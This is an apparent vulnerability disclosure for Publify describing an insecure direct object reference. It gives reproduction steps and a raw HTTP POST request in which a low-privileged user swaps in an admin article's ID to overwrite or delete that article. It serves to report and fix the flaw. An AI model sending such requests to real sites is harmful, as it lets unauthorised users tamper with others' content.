Description

A low-privileged user can modify and delete admin articles just by changing the value of the article[id] parameter.

Proof of Concept

• Step 1 - Authenticated as an unprivileged user, create a New article

• Step 2 - Click Edit article

• Step 3 - Intercept requests and Save your article

• Step 4 - In the request that was intercepted, change the value of the article[id] parameter to theID of admin article (You can get the id by copying the edit link of article)

• Step 5 - Submit a request and the admin article will be hijacked.

POST /admin/content/5850 HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=cookie
Content-Length: 2234
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://demo-publify.herokuapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBydp1QV5GIbVRQBU
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
...
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[id]"

ID_ARTICLE_ADMIN_HERE
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[title]"

hacked
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[body_and_extended]"

hacked
------WebKitFormBoundaryBydp1QV5GIbVRQBU
Content-Disposition: form-data; name="article[keywords]"
...

Demo

https://drive.google.com/file/d/1OymOxmRG-B2p0DD0ZcFUyJiwx_k-NVGf/view?usp=sharing